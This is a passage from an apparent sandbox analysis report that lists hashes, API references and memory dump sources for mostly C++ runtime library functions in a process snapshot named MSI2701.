                                                                                                                                                            • Opcode ID: 8ea5d6ed0f035dfeb18d73085744919303a9263989045b6a9f4186de513e3a2b
                                                                                                                                                            • Instruction ID: 00f0d5818abfee44a8cdebb7a7883aba8edbee55cd495a5d9a415536cf2cfa40
                                                                                                                                                            • Opcode Fuzzy Hash: 8ea5d6ed0f035dfeb18d73085744919303a9263989045b6a9f4186de513e3a2b
                                                                                                                                                            • Instruction Fuzzy Hash: 6F719134D04258ABCF15DFA4D4606EDBBB2AF59314F28409BEC417B362DB389D46CB58
                                                                                                                                                            Function 004D180A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 3382595777-2395104290
                                                                                                                                                            • Opcode ID: 0f40e2ba3ffdd2fc50c9d7abc256305add1b152b139cd856ab8d49b28604bc63
                                                                                                                                                            • Instruction ID: d9fa324d4c00e749337978d492dc9fa9b98c8e13faa125c86b122ff8f80bca74
                                                                                                                                                            • Opcode Fuzzy Hash: 0f40e2ba3ffdd2fc50c9d7abc256305add1b152b139cd856ab8d49b28604bc63
                                                                                                                                                            • Instruction Fuzzy Hash: BA718D74D04218ABCF14DF95D5B06EDBBB2AF19314F14409BEC82A7391DB385D42CB58
                                                                                                                                                            Function 004D1A26 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 3382595777-2395104290
                                                                                                                                                            • Opcode ID: 57dcb0b518b20c6b4b7eb146e82b6bfbb8e8e6a7ce97d837c00c372c6720ac07
                                                                                                                                                            • Instruction ID: 63223bc8cf8bcba491db3b6cb05cd56867e8d1bdd594d78f2068cfa9551357aa
                                                                                                                                                            • Opcode Fuzzy Hash: 57dcb0b518b20c6b4b7eb146e82b6bfbb8e8e6a7ce97d837c00c372c6720ac07
                                                                                                                                                            • Instruction Fuzzy Hash: E571BE34A05258ABCF14DF95C5A0AEDBBB1AF19314F14404BEC426B3A1EB386D42CB58
                                                                                                                                                            Function 004E1E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                            • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                            • API String ID: 3732870572-1956417402
                                                                                                                                                            • Opcode ID: b2d9bbb78ba47d0df95b67ceb375ae015c3ffa61da4d6147042d88ec4efbe3e0
                                                                                                                                                            • Instruction ID: 5b05693a76ca91da43256e63829409c45405774a9ef2720395bea3e960ddde99
                                                                                                                                                            • Opcode Fuzzy Hash: b2d9bbb78ba47d0df95b67ceb375ae015c3ffa61da4d6147042d88ec4efbe3e0
                                                                                                                                                            • Instruction Fuzzy Hash: 6551F330B442C59ADF258EAF8481BBF7BB9AF05352F14445BE981D73A1C3788942CB99
                                                                                                                                                            Function 004CBD90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 004CBF6E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                            • String ID: false$true
                                                                                                                                                            • API String ID: 118556049-2658103896
                                                                                                                                                            • Opcode ID: 26378d2e26ca353ce1f0c986bedc52194bae246626b5f55fdbd830e33489f92b
                                                                                                                                                            • Instruction ID: 081dd8fd24319a2a2354b51da446820a51ad1117006ee962fe1a8c96e44649b6
                                                                                                                                                            • Opcode Fuzzy Hash: 26378d2e26ca353ce1f0c986bedc52194bae246626b5f55fdbd830e33489f92b
                                                                                                                                                            • Instruction Fuzzy Hash: 9F51C4B5D007489FDB10CFA5C841BEEBBB8FF44304F14425EE805A7241E775A985CB95
                                                                                                                                                            Function 004C70A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: \\?\$\\?\UNC\
                                                                                                                                                            • API String ID: 0-3019864461
                                                                                                                                                            • Opcode ID: 6f985207577bb3b59bd6a182ecc051afa2cd390bd726dee1459516f6a99a3016
                                                                                                                                                            • Instruction ID: f8344111a11d6f644b775ec91730ab39a25ebe05270e909170327e215e152f62
                                                                                                                                                            • Opcode Fuzzy Hash: 6f985207577bb3b59bd6a182ecc051afa2cd390bd726dee1459516f6a99a3016
                                                                                                                                                            • Instruction Fuzzy Hash: 6D51EF74A042089BDB14CF64C985FAEBBB5FF89304F14451EE401A7381DBB8A984CF98
                                                                                                                                                            Function 004E6059 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004E607E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                            • Opcode ID: ce91e8df8bfe1a3a328eae190c39c4c4f235627521d508f5266a7e22e569a364
                                                                                                                                                            • Instruction ID: bd51ac577532cc1671bf1cdf73ff67a16e08c2ca966096d4f7ab50b6cfb38332
                                                                                                                                                            • Opcode Fuzzy Hash: ce91e8df8bfe1a3a328eae190c39c4c4f235627521d508f5266a7e22e569a364
                                                                                                                                                            • Instruction Fuzzy Hash: E441CA71900289EFCF16CF9ACC81AEEBBB5FF18345F19809AF90867212D3399950CB54
                                                                                                                                                            Function 004DDF8F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3___cftoe
                                                                                                                                                            • String ID: !%x
                                                                                                                                                            • API String ID: 855520168-1893981228
                                                                                                                                                            • Opcode ID: 34db278f776f6c253f0d744cd3a18c3e5e4de3eddcbb6029cdb15418aa64994c
                                                                                                                                                            • Instruction ID: 502792683222942e4c130ae414a96c6cc117670b3faa0d1f724fc244f7e3491f
                                                                                                                                                            • Opcode Fuzzy Hash: 34db278f776f6c253f0d744cd3a18c3e5e4de3eddcbb6029cdb15418aa64994c
                                                                                                                                                            • Instruction Fuzzy Hash: 27318B71D0020DEBDF04EF95E991AEEB7B5FF08308F10441AF905AB251DB79AA45CB68
                                                                                                                                                            Function 004E19FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3___cftoe
                                                                                                                                                            • String ID: !%x
                                                                                                                                                            • API String ID: 855520168-1893981228
                                                                                                                                                            • Opcode ID: c3e41ce37db6bbabe0d234ea860c3e57e9e59d06c0ab525cfc3a0f1eb9889029
                                                                                                                                                            • Instruction ID: 7026f99a643e665c1d91994efa9826b1ed21ac9145f5ef3db0fd578fac907b58
                                                                                                                                                            • Opcode Fuzzy Hash: c3e41ce37db6bbabe0d234ea860c3e57e9e59d06c0ab525cfc3a0f1eb9889029
                                                                                                                                                            • Instruction Fuzzy Hash: B5319A31D05288AFDF01DF95E981EFEBBB5EF19305F10002AF844A7252D7799A45CBA8
                                                                                                                                                            Function 004C5F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 004C5F86
                                                                                                                                                            • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,C7C71CC4), ref: 004C5FF6
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConvertFreeLocalString
                                                                                                                                                            • String ID: Invalid SID
                                                                                                                                                            • API String ID: 3201929900-130637731
                                                                                                                                                            • Opcode ID: 203dcb540cd8f36a01cbe1e9b7db76c484b8bc71af2a47ac55ffbda19249884c
                                                                                                                                                            • Instruction ID: f85b18ffdb052a7dde3378936928651ba8b153c6f6c03cd2a331a2cb69be6390
                                                                                                                                                            • Opcode Fuzzy Hash: 203dcb540cd8f36a01cbe1e9b7db76c484b8bc71af2a47ac55ffbda19249884c
                                                                                                                                                            • Instruction Fuzzy Hash: 6321D274A04609DBDB14CF58C815BAFBBF8FF48718F104A1EE401A7380D7BA6A448BD4
                                                                                                                                                            Function 004C9070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004C909B
                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004C90FE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                            • API String ID: 3988782225-1405518554
                                                                                                                                                            • Opcode ID: 1e0be955be93bb8b3594d4e262cb7b034ba9ee99c4c65e090d0a09d892e14ddf
                                                                                                                                                            • Instruction ID: cff5e573ae7dd5c9d4e16337ee6a19b339eef92a7c0d7ad888d7189d493df295
                                                                                                                                                            • Opcode Fuzzy Hash: 1e0be955be93bb8b3594d4e262cb7b034ba9ee99c4c65e090d0a09d892e14ddf
                                                                                                                                                            • Instruction Fuzzy Hash: A5210570805B84DED721CF68C90478BBFF4EF19314F00869ED49597781D3B9A604CBA5
                                                                                                                                                            Function 004CF098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                                            • String ID: false$true
                                                                                                                                                            • API String ID: 2427045233-2658103896
                                                                                                                                                            • Opcode ID: 9f529719a46f4c2ac24699e7a2c1f88eb0a022974e72caaed4871f255c30d970
                                                                                                                                                            • Instruction ID: 9b36a60b407f9167d183ac3211846239c6f92b65935f90370d2fc797a9d889ae
                                                                                                                                                            • Opcode Fuzzy Hash: 9f529719a46f4c2ac24699e7a2c1f88eb0a022974e72caaed4871f255c30d970
                                                                                                                                                            • Instruction Fuzzy Hash: 2511D075900744EEC720EFB6D841B8ABBF4AF04304F04C56FE5959B352EA38E549CB54
                                                                                                                                                            Function 004D0D24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D0D30
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D0D8B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 593203224-2395104290
                                                                                                                                                            • Opcode ID: 3e77d73dac7966c01db575da67ff50cf34d999754be76ff72f925f95971adf9d
                                                                                                                                                            • Instruction ID: 630f62734b049f2ada8427d912d141095eb2e18b465fd659b95a75615f082736
                                                                                                                                                            • Opcode Fuzzy Hash: 3e77d73dac7966c01db575da67ff50cf34d999754be76ff72f925f95971adf9d
                                                                                                                                                            • Instruction Fuzzy Hash: 66019E35600608AFCB14DF55C861A9E7BB6EF98350F14009BE8069B361DB70FE41CBA4
                                                                                                                                                            Function 004F776F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 004F77AF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                            • String ID: 2N$InitializeCriticalSectionEx
                                                                                                                                                            • API String ID: 2593887523-1053568252
                                                                                                                                                            • Opcode ID: 870e2ab7a0aad8bc3687c5863e5baa702e5195f8eb1c37f8b2c65048fe303389
                                                                                                                                                            • Instruction ID: a34d6b124700341912dbc93a1877e977c76489d9d8958c70093f8d3eab1d3a65
                                                                                                                                                            • Opcode Fuzzy Hash: 870e2ab7a0aad8bc3687c5863e5baa702e5195f8eb1c37f8b2c65048fe303389
                                                                                                                                                            • Instruction Fuzzy Hash: 54E0923659421DBBEB112F61DC45D9E7F61FB04760B004011FE08651A1DB759821EAD4
                                                                                                                                                            Function 004F7559 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Alloc
                                                                                                                                                            • String ID: 2N$FlsAlloc
                                                                                                                                                            • API String ID: 2773662609-4087932535
                                                                                                                                                            • Opcode ID: 721f6e5a1d1944565fc16475362cb19e316b0e4fe7cd83525240327cb68b7294
                                                                                                                                                            • Instruction ID: 04b1d2a15ad72989cab69fa46d038d071b49f51eb8ef26e613162d5df7e0bca5
                                                                                                                                                            • Opcode Fuzzy Hash: 721f6e5a1d1944565fc16475362cb19e316b0e4fe7cd83525240327cb68b7294
                                                                                                                                                            • Instruction Fuzzy Hash: 31E0C233A8832CB7D72127619C06EAEBD55EF58B60B040032FE04192D19BAE5812E2DA
                                                                                                                                                            Function 004F7915 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FreeLibrary.KERNEL32(0051E428), ref: 004F7932
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                            • String ID: (Q$xQ
                                                                                                                                                            • API String ID: 3664257935-2520453697
                                                                                                                                                            • Opcode ID: e408bc19f70a890cedbf3d6b8e0090ec9245b3674f60fe3c468e50ee0711e3f5
                                                                                                                                                            • Instruction ID: 652ed09944ffcc1c2ebdf29337a50451ec42049538798433beba786cb379ac14
                                                                                                                                                            • Opcode Fuzzy Hash: e408bc19f70a890cedbf3d6b8e0090ec9245b3674f60fe3c468e50ee0711e3f5
                                                                                                                                                            • Instruction Fuzzy Hash: 09E08672C0821D97FF311E08D404FB6BAD89764331F15012BD9EC112A092FD1CD1C6D4
                                                                                                                                                            Function 004C4070 Relevance: 5.2, APIs: 4, Instructions: 189memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • LocalFree.KERNEL32(00000000,004C4261,00504400,000000FF,C7C71CC4,00000000,?,00000000,?,?,?,00504400,000000FF,?,004C3A75,?), ref: 004C4096
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,40000022,C7C71CC4,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004C4154
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,3FFFFFFF,C7C71CC4,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004C4177
                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004C4217
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Local$AllocFree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2012307162-0
                                                                                                                                                            • Opcode ID: b246a501348f66abf24a74b90528fd2da01d26aa535199c8292862d596bf2b19
                                                                                                                                                            • Instruction ID: f26d6cccb78037254d4df243507150dbd5e7eee14505e8bf6924e1bb5b682d3b
                                                                                                                                                            • Opcode Fuzzy Hash: b246a501348f66abf24a74b90528fd2da01d26aa535199c8292862d596bf2b19
                                                                                                                                                            • Instruction Fuzzy Hash: 3B51B375A002059FDB18CF69C995FAEBBB5FB88350F14462EE925E7380D734AD40CB94
                                                                                                                                                            Function 004C1D80 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
